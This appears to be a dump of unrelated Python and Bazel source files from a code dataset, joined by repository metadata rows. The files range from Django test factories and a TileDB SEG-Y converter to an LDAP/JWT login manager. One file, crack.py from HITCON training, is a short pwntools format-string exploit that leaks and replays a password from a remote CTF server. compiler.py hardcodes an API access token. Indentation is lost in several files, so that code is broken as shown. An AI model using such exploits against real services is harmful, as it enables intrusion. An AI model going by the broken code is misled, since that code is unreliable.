# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals
from django.utils import timezone
try:
import factory
except ImportError as e:
raise ImportError('The package "factory-boy" is required.')
else:
from factory import fuzzy
class ConferenceFactory(factory.django.DjangoModelFactory):
    """Factory for ``conference.Conference`` instances."""

    # Sequential, unique names and matching slugs: "Conference 0" /
    # "conference-0", "Conference 1" / "conference-1", ...
    name = factory.Sequence(lambda n: 'Conference {}'.format(n))
    slug = factory.Sequence(lambda n: 'conference-{}'.format(n))

    class Meta(object):
        model = 'conference.Conference'
class TimeSlotFactory(factory.django.DjangoModelFactory):
    """Factory for ``conference.TimeSlot`` instances.

    Produces one-hour slots attached to a freshly created conference.
    """

    conference = factory.SubFactory('conference.factories.ConferenceFactory')
    name = factory.Sequence(lambda n: 'Time Slot {}'.format(n))
    # Random timezone-aware start between 2000-01-01 and 2020-01-01 (UTC).
    start_at = fuzzy.FuzzyDateTime(
        timezone.pytz.timezone('UTC').localize(timezone.datetime(2000, 1, 1)),
        timezone.pytz.timezone('UTC').localize(timezone.datetime(2020, 1, 1)))
    # Every slot ends exactly one hour after its (fuzzed) start.
    end_at = factory.LazyAttribute(
        lambda o: o.start_at + timezone.timedelta(hours=1))

    class Meta(object):
        model = 'conference.TimeSlot'
class VenueFactory(factory.django.DjangoModelFactory):
    """Factory for ``conference.Venue`` instances with sequential names."""

    name = factory.Sequence(lambda n: 'Venue {}'.format(n))

    class Meta(object):
        model = 'conference.Venue'
| 29.677419 | 78 | 0.721196 | 987 | 0.536413 | 0 | 0 | 0 | 0 | 0 | 0 | 792 | 0.430435 |
5e354afb63b174f5f617ab1a12d24daceb3e23d7 | 1,879 | py | Python | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | import time
from anchore_engine import db
from anchore_engine.db import User
def add(userId, password, inobj, session=None):
    """Create the user *userId* or update it if it already exists.

    *inobj* is a dict of additional user fields.  A new user gets a
    ``created_at`` timestamp unless the caller supplied one; an existing
    user has its password refreshed along with the other fields.  The
    session is not committed here.  Returns True.
    """
    if not session:
        session = db.Session()

    # Work on a copy so the caller's dict is not mutated as a side effect
    # (the original injected 'created_at' / 'password' into *inobj*).
    payload = dict(inobj)

    our_result = session.query(User).filter_by(userId=userId).first()
    if not our_result:
        # New user: stamp a creation time unless one was supplied.
        our_result = User(userId=userId, password=password)
        if 'created_at' not in payload:
            payload['created_at'] = int(time.time())
        our_result.update(payload)
        session.add(our_result)
    else:
        # Existing user: refresh the password along with the other fields.
        payload['password'] = password
        our_result.update(payload)
    return True
def get_all(session=None):
if not session:
session = db.Session()
ret = []
our_results = session.query(User).filter_by()
for result in our_results:
obj = {}
obj.update(dict((key,value) for key, value in vars(result).items() if not key.startswith('_')))
ret.append(obj)
return(ret)
def get(userId, session=None):
if not session:
session = db.Session()
ret = {}
result = session.query(User).filter_by(userId=userId).first()
if result:
obj = dict((key,value) for key, value in vars(result).items() if not key.startswith('_'))
ret = obj
return(ret)
def update(userId, password, inobj, session=None):
return(add(userId, password, inobj, session=session))
def delete(userId, session=None):
if not session:
session = db.Session()
ret = False
result = session.query(User).filter_by(userId=userId).first()
if result:
session.delete(result)
ret = True
# try:
# session.commit()
# ret = True
# except Exception as err:
# raise err
# finally:
# session.rollback()
return(ret)
| 23.4875 | 103 | 0.610963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 293 | 0.155934 |
5e359e3a1d5de976c3e6e2ada1244b9cf4a25c97 | 10,116 | py | Python | tiledb/segy/convert.py | TileDB-Inc/tilesegy | d7a7703eea62dd27bcc1444d932bd4efaa50293c | [
"MIT"
] | null | null | null | tiledb/segy/convert.py | TileDB-Inc/tilesegy | d7a7703eea62dd27bcc1444d932bd4efaa50293c | [
"MIT"
] | 3 | 2020-12-21T15:52:03.000Z | 2021-01-15T11:48:21.000Z | tiledb/segy/convert.py | TileDB-Inc/tilesegy | d7a7703eea62dd27bcc1444d932bd4efaa50293c | [
"MIT"
] | null | null | null | import copy
from abc import ABC, abstractmethod
from collections import namedtuple
from contextlib import contextmanager
from pathlib import PurePath
from typing import Any, Iterable, Iterator, Optional, Union, cast
import numpy as np
import segyio
import segyio.tools
from cached_property import cached_property
from urlpath import URL
import tiledb
TypedTraceField = namedtuple("TypedTraceField", ["name", "enum", "dtype"])
def iter_typed_trace_fields() -> Iterator[TypedTraceField]:
all_fields = segyio.TraceField.enums()
include_names = set(map(str, segyio.field.Field._tr_keys))
size2dtype = {2: np.dtype(np.int16), 4: np.dtype(np.int32)}
for f, f2 in zip(all_fields, all_fields[1:]):
name = str(f)
if name in include_names:
yield TypedTraceField(name, f, size2dtype[int(f2) - int(f)])
TRACE_FIELDS = tuple(iter_typed_trace_fields())
TRACE_FIELD_ENUMS = tuple(int(f.enum) for f in TRACE_FIELDS)
TRACE_FIELD_NAMES = tuple(f.name for f in TRACE_FIELDS)
TRACE_FIELD_DTYPES = tuple(f.dtype for f in TRACE_FIELDS)
TRACE_FIELDS_SIZE = sum(dtype.itemsize for dtype in TRACE_FIELD_DTYPES)
TRACE_FIELD_FILTERS = (
tiledb.BitWidthReductionFilter(),
tiledb.ByteShuffleFilter(),
tiledb.LZ4Filter(),
)
class ExtendedSegyFile(segyio.SegyFile):
@cached_property
def trace_size(self) -> int:
return len(self._samples) * int(self._dtype.itemsize)
@cached_property
def fast_headerline(self) -> segyio.line.HeaderLine:
return self._header.iline if self.is_inline else self._header.xline
@cached_property
def fast_lines(self) -> np.ndarray:
return self._ilines if self.is_inline else self._xlines
@cached_property
def slow_lines(self) -> np.ndarray:
return self._xlines if self.is_inline else self._ilines
@cached_property
def is_inline(self) -> bool:
assert not self.unstructured
return bool(self.sorting == segyio.TraceSortingFormat.INLINE_SORTING)
class SegyFileConverter(ABC):
def __new__(cls, segy_file: segyio.SegyFile, **kwargs: Any) -> "SegyFileConverter":
if cls is SegyFileConverter:
if segy_file.unstructured:
cls = UnstructuredSegyFileConverter
else:
cls = StructuredSegyFileConverter
return cast(SegyFileConverter, super().__new__(cls))
def __init__(
self,
segy_file: segyio.SegyFile,
*,
tile_size: int,
config: Optional[tiledb.Config] = None,
):
if not isinstance(segy_file, ExtendedSegyFile):
segy_file = copy.copy(segy_file)
segy_file.__class__ = ExtendedSegyFile
self.segy_file = segy_file
self.tile_size = tile_size
self.config = config
def to_tiledb(self, uri: Union[str, PurePath]) -> None:
uri = URL(uri) if not isinstance(uri, PurePath) else uri
if tiledb.object_type(str(uri)) != "group":
tiledb.group_create(str(uri))
headers_uri = str(uri / "headers")
if tiledb.object_type(headers_uri) != "array":
dims = self._get_dims(TRACE_FIELDS_SIZE)
header_schema = tiledb.ArraySchema(
domain=tiledb.Domain(*dims),
sparse=False,
attrs=[
tiledb.Attr(f.name, f.dtype, filters=TRACE_FIELD_FILTERS)
for f in TRACE_FIELDS
],
)
with self._tiledb_array(headers_uri, header_schema) as tdb:
self._fill_headers(tdb)
data_uri = str(uri / "data")
if tiledb.object_type(data_uri) != "array":
samples = len(self.segy_file.samples)
sample_dtype = self.segy_file.dtype
sample_size = sample_dtype.itemsize
dims = list(self._get_dims(sample_size * samples))
dims.append(
tiledb.Dim(
name="samples",
domain=(0, samples - 1),
dtype=dims[0].dtype,
tile=np.clip(self.tile_size // sample_size, 1, samples),
)
)
data_schema = tiledb.ArraySchema(
domain=tiledb.Domain(*dims),
sparse=False,
attrs=[
tiledb.Attr("trace", sample_dtype, filters=(tiledb.LZ4Filter(),))
],
)
with self._tiledb_array(data_uri, data_schema) as tdb:
self._fill_data(tdb)
@contextmanager
def _tiledb_array(
self, uri: str, schema: tiledb.ArraySchema
) -> Iterator[tiledb.Array]:
tiledb.Array.create(uri, schema)
with tiledb.open(uri, mode="w") as tdb:
yield tdb
tiledb.consolidate(uri, config=self.config)
tiledb.vacuum(uri, config=self.config)
@abstractmethod
def _get_dims(self, trace_size: int) -> Iterable[tiledb.Dim]:
"""Get the tiledb schema dimensions"""
@abstractmethod
def _fill_headers(self, tdb: tiledb.Array) -> None:
tdb.meta["__text__"] = b"".join(self.segy_file.text)
for k, v in self.segy_file.bin.items():
tdb.meta[str(k)] = v
@abstractmethod
def _fill_data(self, tdb: tiledb.Array) -> None:
tdb.meta["sorting"] = (
self.segy_file.sorting or segyio.TraceSortingFormat.UNKNOWN_SORTING
)
tdb.meta["samples"] = self.segy_file.samples.tolist()
tdb.meta["dt"] = segyio.tools.dt(self.segy_file, fallback_dt=0)
class UnstructuredSegyFileConverter(SegyFileConverter):
def _get_dims(self, trace_size: int) -> Iterable[tiledb.Dim]:
traces = self.segy_file.tracecount
return [
tiledb.Dim(
name="traces",
domain=(0, traces - 1),
dtype=np.uint64,
tile=np.clip(self.tile_size // trace_size, 1, traces),
),
]
def _fill_headers(self, tdb: tiledb.Array) -> None:
super()._fill_headers(tdb)
traces = self.segy_file.tracecount
get_header = self.segy_file.header
step = np.clip(self.tile_size // TRACE_FIELDS_SIZE, 1, traces)
for sl in iter_slices(traces, step):
headers = [
np.zeros(sl.stop - sl.start, dtype) for dtype in TRACE_FIELD_DTYPES
]
for i, field in enumerate(get_header[sl]):
getfield, buf = field.getfield, field.buf
for key, header in zip(TRACE_FIELD_ENUMS, headers):
v = getfield(buf, key)
if v:
header[i] = v
tdb[sl] = dict(zip(TRACE_FIELD_NAMES, headers))
def _fill_data(self, tdb: tiledb.Array) -> None:
super()._fill_data(tdb)
raw_trace = self.segy_file.trace.raw
traces = self.segy_file.tracecount
step = np.clip(self.tile_size // self.segy_file.trace_size, 1, traces)
for sl in iter_slices(traces, step):
tdb[sl] = raw_trace[sl]
class StructuredSegyFileConverter(SegyFileConverter):
def _get_dims(self, trace_size: int) -> Iterable[tiledb.Dim]:
dtype = np.uintc
slow_lines = len(self.segy_file.slow_lines)
if self.segy_file.is_inline:
fast_dim, slow_dim = "ilines", "xlines"
else:
fast_dim, slow_dim = "xlines", "ilines"
return [
tiledb.Dim(
name=fast_dim,
domain=(0, len(self.segy_file.fast_lines) - 1),
dtype=dtype,
tile=self._fast_tile(trace_size),
),
tiledb.Dim(
name=slow_dim,
domain=(0, slow_lines - 1),
dtype=dtype,
tile=slow_lines,
),
tiledb.Dim(
name="offsets",
domain=(0, len(self.segy_file.offsets) - 1),
dtype=dtype,
tile=1,
),
]
def _fill_headers(self, tdb: tiledb.Array) -> None:
super()._fill_headers(tdb)
step = self._fast_tile(TRACE_FIELDS_SIZE)
fast_lines = self.segy_file.fast_lines
slow_lines = self.segy_file.slow_lines
fast_headerline = self.segy_file.fast_headerline
for offset_idx, offset in enumerate(self.segy_file.offsets):
for sl in iter_slices(len(fast_lines), step):
slice_lines = fast_lines[sl]
cubes = [
np.zeros((len(slice_lines), len(slow_lines)), dtype)
for dtype in TRACE_FIELD_DTYPES
]
for i, line in enumerate(slice_lines):
for j, field in enumerate(fast_headerline[line, offset]):
getfield, buf = field.getfield, field.buf
for key, cube in zip(TRACE_FIELD_ENUMS, cubes):
v = getfield(buf, key)
if v:
cube[i, j] = v
tdb[sl, :, offset_idx] = dict(zip(TRACE_FIELD_NAMES, cubes))
def _fill_data(self, tdb: tiledb.Array) -> None:
super()._fill_data(tdb)
for key in "ilines", "xlines", "offsets":
tdb.meta[key] = getattr(self.segy_file, key).tolist()
step = self._fast_tile(self.segy_file.trace_size)
fast_lines = self.segy_file.fast_lines
get_line = self.segy_file.fast
for offset_idx, offset in enumerate(self.segy_file.offsets):
for sl in iter_slices(len(fast_lines), step):
cube = np.stack([get_line[i, offset] for i in fast_lines[sl]])
tdb[sl, :, offset_idx] = cube
def _fast_tile(self, trace_size: int) -> int:
num_fast, num_slow = map(
len, (self.segy_file.fast_lines, self.segy_file.slow_lines)
)
return int(np.clip(self.tile_size // (num_slow * trace_size), 1, num_fast))
def iter_slices(size: int, step: int) -> Iterator[slice]:
r = range(0, size, step)
yield from map(slice, r, r[1:])
yield slice(r[-1], size)
| 37.054945 | 87 | 0.59223 | 8,693 | 0.859332 | 871 | 0.086101 | 1,661 | 0.164195 | 0 | 0 | 257 | 0.025405 |
5e36244123ee5c6940be37309dff373ccc4d49dc | 40 | py | Python | src/maggma/api/__init__.py | materialsproject/maggflow | 9f8d7a0865ec13212a3fd00d5edebd3cb7b40e7d | [
"BSD-3-Clause-LBNL"
] | 15 | 2017-06-15T16:35:23.000Z | 2022-03-05T09:57:02.000Z | src/maggma/api/__init__.py | materialsproject/maggflow | 9f8d7a0865ec13212a3fd00d5edebd3cb7b40e7d | [
"BSD-3-Clause-LBNL"
] | 573 | 2017-06-14T15:54:27.000Z | 2022-03-31T23:20:55.000Z | src/maggma/api/__init__.py | rkingsbury/maggma | 53def068df1cb410bfe91e7045903997813e173a | [
"BSD-3-Clause-LBNL"
] | 28 | 2017-06-14T20:50:26.000Z | 2022-03-04T16:56:40.000Z | """ Simple API Interface for Maggma """
| 20 | 39 | 0.675 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 39 | 0.975 |
5e38493f0fa872e04c4bfac3ddb969b05f7e7104 | 522 | py | Python | dos/gen_palette.py | dbrotz/fire-effect | 68c8954b6ffb4729bfcaa0df5b377d8793bbc914 | [
"MIT"
] | null | null | null | dos/gen_palette.py | dbrotz/fire-effect | 68c8954b6ffb4729bfcaa0df5b377d8793bbc914 | [
"MIT"
] | null | null | null | dos/gen_palette.py | dbrotz/fire-effect | 68c8954b6ffb4729bfcaa0df5b377d8793bbc914 | [
"MIT"
] | null | null | null | import colorsys
palette_size = 80
palette = []
for i in range(palette_size):
t = i / (palette_size - 1)
h = t * (60 / 360)
l = t
s = 1.0
color = colorsys.hls_to_rgb(h, l, s)
color = tuple(map(lambda x: round(x * 63), color))
palette.append(color)
with open('palette.asm', 'w', newline='\n') as f:
f.write('palette:\n')
for color in palette:
f.write('\tdb ');
color = map(lambda x: '0x{:02X}'.format(x), color)
f.write(', '.join(color))
f.write('\n')
| 22.695652 | 58 | 0.547893 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 57 | 0.109195 |
5e3a9ab4118c0f0c1c0188378ff8afd2c67ece34 | 350 | py | Python | HITCON-Training/LAB/lab7/crack.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | 30 | 2017-09-05T14:29:30.000Z | 2022-03-20T01:51:29.000Z | HITCON-Training/LAB/lab7/crack.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | null | null | null | HITCON-Training/LAB/lab7/crack.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | 7 | 2018-03-15T10:07:43.000Z | 2020-12-14T09:36:19.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "training.pwnable.tw"
port = 11007
r = remote(host,port)
password_addr = 0x804a048
r.recvuntil("?")
r.sendline(p32(password_addr) + "#" + "%10$s" + "#" )
r.recvuntil("#")
p = r.recvuntil("#")
password = u32(p[:4])
r.recvuntil(":")
r.sendline(str(password))
r.interactive()
| 15.909091 | 53 | 0.625714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 90 | 0.257143 |
5e3b823d0f87912b114dc8c0fa28049792efe0c4 | 675 | py | Python | tests/test_records.py | tomfallen/python-fitparse | ea5532a976cf123fc6a787a0e94708511e0e11a7 | [
"MIT"
] | 548 | 2015-01-04T23:10:59.000Z | 2022-03-31T07:34:28.000Z | tests/test_records.py | tomfallen/python-fitparse | ea5532a976cf123fc6a787a0e94708511e0e11a7 | [
"MIT"
] | 108 | 2015-01-05T13:27:29.000Z | 2022-03-01T09:21:24.000Z | tests/test_records.py | tomfallen/python-fitparse | ea5532a976cf123fc6a787a0e94708511e0e11a7 | [
"MIT"
] | 170 | 2015-01-12T19:14:51.000Z | 2022-02-27T17:44:30.000Z | #!/usr/bin/env python
import sys
from fitparse.records import Crc
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
class RecordsTestCase(unittest.TestCase):
def test_crc(self):
crc = Crc()
self.assertEqual(0, crc.value)
crc.update(b'\x0e\x10\x98\x00(\x00\x00\x00.FIT')
self.assertEqual(0xace7, crc.value)
# 0 must not change the crc
crc.update(0)
self.assertEqual(0xace7, crc.value)
def test_crc_format(self):
self.assertEqual('0x0000', Crc.format(0))
self.assertEqual('0x12AB', Crc.format(0x12AB))
if __name__ == '__main__':
unittest.main()
| 22.5 | 56 | 0.645926 | 464 | 0.687407 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.162963 |
eaa369f6384c7d274e6bec1f3e2e2cfe6baf997b | 1,420 | bzl | Python | bazel/deps.bzl | quantapix/semtools | dce8840adc86e6a9672447aace969d37e236f922 | [
"MIT"
] | null | null | null | bazel/deps.bzl | quantapix/semtools | dce8840adc86e6a9672447aace969d37e236f922 | [
"MIT"
] | null | null | null | bazel/deps.bzl | quantapix/semtools | dce8840adc86e6a9672447aace969d37e236f922 | [
"MIT"
] | null | null | null | load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_file")
BAZEL_INSTALLER = struct(
revision = "4.0.0",
sha256 = "bd7a3a583a18640f58308c26e654239d412adaa833b6b6a7b57a216ab62fabc2",
)
DEBS_TARBALL = struct(
revision = "1608132805",
sha256 = "7ed2d4869f19c11d8c39345bd75f908a51410bf4e512e9fc368ad0c2bbf43e28",
)
def deps():
"""Download deps"""
excludes = native.existing_rules().keys()
if "ubuntu1604_bazel_installer" not in excludes:
http_file(
name = "ubuntu1604_bazel_installer",
downloaded_file_path = "bazel-installer.sh",
sha256 = BAZEL_INSTALLER.sha256,
urls = [
"https://releases.bazel.build/" + BAZEL_INSTALLER.revision + "/release/bazel-" + BAZEL_INSTALLER.revision + "-installer-linux-x86_64.sh",
"https://github.com/bazelbuild/bazel/releases/download/" + BAZEL_INSTALLER.revision + "/bazel-" + BAZEL_INSTALLER.revision + "-installer-linux-x86_64.sh",
],
)
if "ubuntu1604_bazel_debs" not in excludes:
http_file(
name = "ubuntu1604_bazel_debs",
downloaded_file_path = DEBS_TARBALL.revision + "_bazel_debs.tar",
sha256 = DEBS_TARBALL.sha256,
urls = [
"https://storage.googleapis.com/layer-deps/ubuntu1604/bazel/debs/" + DEBS_TARBALL.revision + "_bazel_debs.tar",
],
)
| 38.378378 | 170 | 0.64507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 618 | 0.435211 |
eaa3714aff832e686ae4830447a5096de12ce12d | 143 | py | Python | Python/Sets/Set.add().py | pavstar619/HackerRank | 697ee46b6e621ad884a064047461d7707b1413cd | [
"MIT"
] | 61 | 2017-04-27T13:45:12.000Z | 2022-01-27T11:40:15.000Z | Python/Sets/Set.add().py | fahad0193/HackerRank | eb6c95e16688c02921c1df6b6ea613667a251457 | [
"MIT"
] | 1 | 2017-06-24T14:16:06.000Z | 2017-06-24T14:16:28.000Z | Python/Sets/Set.add().py | fahad0193/HackerRank | eb6c95e16688c02921c1df6b6ea613667a251457 | [
"MIT"
] | 78 | 2017-07-05T11:48:20.000Z | 2022-02-08T08:04:22.000Z | if __name__ == '__main__':
n = int(input())
s = set()
for i in range (n):
s.add(input())
print((len(s)))
| 15.888889 | 26 | 0.426573 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.06993 |
eaa454aeb2637a676c1e50bb9a3b6f2eb3e45e6f | 87 | py | Python | main.py | spdir/sakf | 9a07c5f90765201a42d524dc6d4554f4ccd3c750 | [
"Apache-2.0"
] | null | null | null | main.py | spdir/sakf | 9a07c5f90765201a42d524dc6d4554f4ccd3c750 | [
"Apache-2.0"
] | null | null | null | main.py | spdir/sakf | 9a07c5f90765201a42d524dc6d4554f4ccd3c750 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from sakf.sakf import main
if __name__ == '__main__':
main() | 17.4 | 26 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 33 | 0.37931 |
eaa5e7d7d957b71c8f9536bbb10b0314303c12f5 | 2,741 | py | Python | compiler.py | ayung8/CodeBoard | 13423ec3eaa1c96e95afb53784dbe24a0a1162c1 | [
"Apache-2.0"
] | 2 | 2019-10-26T03:49:51.000Z | 2019-10-27T06:48:07.000Z | compiler.py | ayung8/CodeBoard | 13423ec3eaa1c96e95afb53784dbe24a0a1162c1 | [
"Apache-2.0"
] | null | null | null | compiler.py | ayung8/CodeBoard | 13423ec3eaa1c96e95afb53784dbe24a0a1162c1 | [
"Apache-2.0"
] | 2 | 2021-07-18T09:17:50.000Z | 2022-03-08T05:03:31.000Z | from sphere_engine import CompilersClientV4
from sphere_engine.exceptions import SphereEngineException
import time
# define access parameters
accessToken = '77501c36922866a03b1822b4508a50c6'
endpoint = 'dd57039c.compilers.sphere-engine.com'
# initialization
client = CompilersClientV4(accessToken, endpoint)
# API usage
# source = 'function f() {return "hello"; } print(f());' # Javascript
# compiler = 112 # Javascript
source = 'print("hello world please work!!!!!")' # Python
compiler = 116 # Python
input = '2017'
# Set default value for response
response = None
# Sends the submission and checks for errors in sending the submission
try:
response = client.submissions.create(source, compiler, input)
# response['id'] stores the ID of the created submission
except SphereEngineException as e:
if e.code == 401:
print('Invalid access token')
elif e.code == 402:
print('Unable to create submission')
elif e.code == 400:
print('Error code: ' + str(e.error_code) + ', details available in the message: ' + str(e))
# Set default value for response data
responseData = None
print("Code submitted is: ")
print(source)
print("Submission ID is: " + str(response.get('id')))
print()
# Try getting submission ID and check if there are errors
try:
client.submissions.get(response.get('id'))
except SphereEngineException as e:
if e.code == 401:
print('Invalid access token')
elif e.code == 403:
print('Access to the submission is forbidden')
elif e.code == 404:
print('Submission does not exist')
# Uses submission ID, and checks every x seconds to see if query has been 'accepted' (finished processing)
while client.submissions.get(response.get('id')).get('result').get('status').get('name') != 'accepted' :
responseData = client.submissions.get(response.get('id'))
print(responseData) # for test purposes
print("Status is: " + responseData.get('result').get('status').get('name'))
time.sleep(5)
print("Status is: " + client.submissions.get(response.get('id')).get('result').get('status').get('name'))
print()
rawresponse = None
# Get the output of the query
try:
rawresponse = client.submissions.getStream(response.get('id'), 'output')
except SphereEngineException as e:
if e.code == 401:
print('Invalid access token')
elif e.code == 403:
print('Access to the submission is forbidden')
elif e.code == 404:
print('Non existing resource, error code: ' + str(e.error_code) + ', details available in the message: ' + str(e))
elif e.code == 400:
print('Error code: ' + str(e.error_code) + ', details available in the message: ' + str(e))
print("Output returned is: ")
print(rawresponse) | 33.426829 | 122 | 0.690259 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,266 | 0.461875 |
eaa6140f555dcb9999992526db8818c254ad7559 | 84 | py | Python | main.py | bzsam/password_generator | 4690e2ed361d3eee4f06cc404f737f904cc3294c | [
"MIT"
] | null | null | null | main.py | bzsam/password_generator | 4690e2ed361d3eee4f06cc404f737f904cc3294c | [
"MIT"
] | null | null | null | main.py | bzsam/password_generator | 4690e2ed361d3eee4f06cc404f737f904cc3294c | [
"MIT"
] | null | null | null | import tkinter as tk
import gui
wd = tk.Tk()
gui = gui.GUI(wd)
wd.mainloop() | 12 | 21 | 0.630952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
eaa6e1abc664210c2d20b6da218369d841465733 | 3,306 | py | Python | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 490 | 2019-01-16T12:57:22.000Z | 2022-03-26T14:13:26.000Z | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 147 | 2019-01-23T13:22:42.000Z | 2022-03-30T11:14:08.000Z | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 91 | 2019-03-11T10:37:50.000Z | 2022-03-28T16:41:32.000Z | import datetime
from flask_ldap3_login import LDAP3LoginManager, AuthenticationResponseStatus
from lost.settings import LOST_CONFIG, FLASK_DEBUG
from flask_jwt_extended import create_access_token, create_refresh_token
from lost.db.model import User as DBUser, Group
from lost.db import roles
class LoginManager():
def __init__(self, dbm, user_name, password):
self.dbm = dbm
self.user_name = user_name
self.password = password
def login(self):
if LOST_CONFIG.ldap_config['LDAP_ACTIVE']:
access_token, refresh_token = self.__authenticate_ldap()
else:
access_token, refresh_token = self.__authenticate_flask()
if access_token and refresh_token:
return {
'token': access_token,
'refresh_token': refresh_token
}, 200
return {'message': 'Invalid credentials'}, 401
def __get_token(self, user_id):
expires = datetime.timedelta(minutes=LOST_CONFIG.session_timeout)
expires_refresh = datetime.timedelta(minutes=LOST_CONFIG.session_timeout + 2)
if FLASK_DEBUG:
expires = datetime.timedelta(days=365)
expires_refresh = datetime.timedelta(days=366)
access_token = create_access_token(identity=user_id, fresh=True, expires_delta=expires)
refresh_token = create_refresh_token(user_id, expires_delta=expires_refresh)
return access_token, refresh_token
def __authenticate_flask(self):
if self.user_name:
user = self.dbm.find_user_by_user_name(self.user_name)
if user and user.check_password(self.password):
return self.__get_token(user.idx)
return None, None
def __authenticate_ldap(self):
# auth with ldap
ldap_manager = LDAP3LoginManager()
ldap_manager.init_config(LOST_CONFIG.ldap_config)
# Check if the credentials are correct
response = ldap_manager.authenticate(self.user_name, self.password)
if response.status != AuthenticationResponseStatus.success:
# no user found in ldap, try it with db user:
return self.__authenticate_flask()
user_info = response.user_info
user = self.dbm.find_user_by_user_name(self.user_name)
# user not in db:
if not user:
user = self.__create_db_user(user_info)
else:
# user in db -> synch with ldap
user = self.__update_db_user(user_info, user)
return self.__get_token(user.idx)
def __create_db_user(self, user_info):
user = DBUser(user_name=user_info['uid'], email=user_info['mail'],
email_confirmed_at=datetime.datetime.now(), first_name=user_info['givenName'],
last_name=user_info['sn'], is_external=True)
anno_role = self.dbm.get_role_by_name(roles.ANNOTATOR)
user.roles.append(anno_role)
user.groups.append(Group(name=user.user_name, is_user_default=True))
self.dbm.save_obj(user)
return user
def __update_db_user(self, user_info, user):
user.email = user_info['mail']
user.first_name = user_info['givenName']
user.last_name = user_info['sn']
self.dbm.save_obj(user)
return user | 42.384615 | 98 | 0.667272 | 3,014 | 0.911676 | 0 | 0 | 0 | 0 | 0 | 0 | 259 | 0.078342 |
eaa6e6b11cc89e6f7aeab32dc3e25a5307983316 | 1,198 | py | Python | betterthanbackprop/feedbackLearners/learningViz/OptimTrajViz.py | conradliste/SmarterThanBackProp | ed615492af052d452f23458ef10ff1264a85b980 | [
"MIT"
] | null | null | null | betterthanbackprop/feedbackLearners/learningViz/OptimTrajViz.py | conradliste/SmarterThanBackProp | ed615492af052d452f23458ef10ff1264a85b980 | [
"MIT"
] | null | null | null | betterthanbackprop/feedbackLearners/learningViz/OptimTrajViz.py | conradliste/SmarterThanBackProp | ed615492af052d452f23458ef10ff1264a85b980 | [
"MIT"
] | null | null | null | import os
import torch
import numpy as np
import torch.nn as nn
import matplotlib.pyplot as plt
def get_param_matrix(model_prefix, model_dir):
"""
Grabs the parameters of a saved model and returns them as a matrix
"""
# Load and combine the parameters
param_matrix = []
for file in os.listdir(model_dir):
if file.startswith(model_prefix):
model_path = os.path.join(model_dir, file)
state_dict = torch.load(model_path)
# Grab all params in state dict
params = [state_dict[param].data.float() for param in state_dict]
# Reshape to one long parameter vector
params = nn.utils.parameters_to_vector(params)
param_matrix.append(params.cpu().numpy())
params_matrix = np.array(param_matrix)
return params_matrix
def plot_trajectory(projected_params):
# Separate components
x = projected_params[:, 0]
y = projected_params[:, 1]
z = projected_params[:, 2]
# Creating figure
fig = plt.figure(figsize = (10, 7))
ax = plt.axes(projection ="3d")
# Creating plot
ax.scatter3D(x, y, z, color="green")
plt.title("Projected Learning Trajectory")
| 31.526316 | 79 | 0.658598 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 281 | 0.234558 |
eaabcde0a0bdb029d9b18b138be58cc64d90cc9c | 1,103 | py | Python | docs/cornell CS class/lesson 9. Conditionals/demos/angl.py | LizzieDeng/kalman_fliter_analysis | 50e728f32c496c3fcbb8ca3ee00857b999b88d99 | [
"MIT"
] | null | null | null | docs/cornell CS class/lesson 9. Conditionals/demos/angl.py | LizzieDeng/kalman_fliter_analysis | 50e728f32c496c3fcbb8ca3ee00857b999b88d99 | [
"MIT"
] | null | null | null | docs/cornell CS class/lesson 9. Conditionals/demos/angl.py | LizzieDeng/kalman_fliter_analysis | 50e728f32c496c3fcbb8ca3ee00857b999b88d99 | [
"MIT"
] | null | null | null | """
Functions to anglicize integers in the range 1..19
This is a simple example for now. We will see a more complex
version of this later.
Author: Walker M. White
Date: March 30, 2019
"""
def anglicize(n):
"""
Returns: English equiv of n.
Parameter: the integer to anglicize
Precondition: n in 1..19
"""
if n == 1:
return 'one'
elif n == 2:
return 'two'
elif n == 3:
return 'three'
elif n == 4:
return 'four'
elif n == 5:
return 'five'
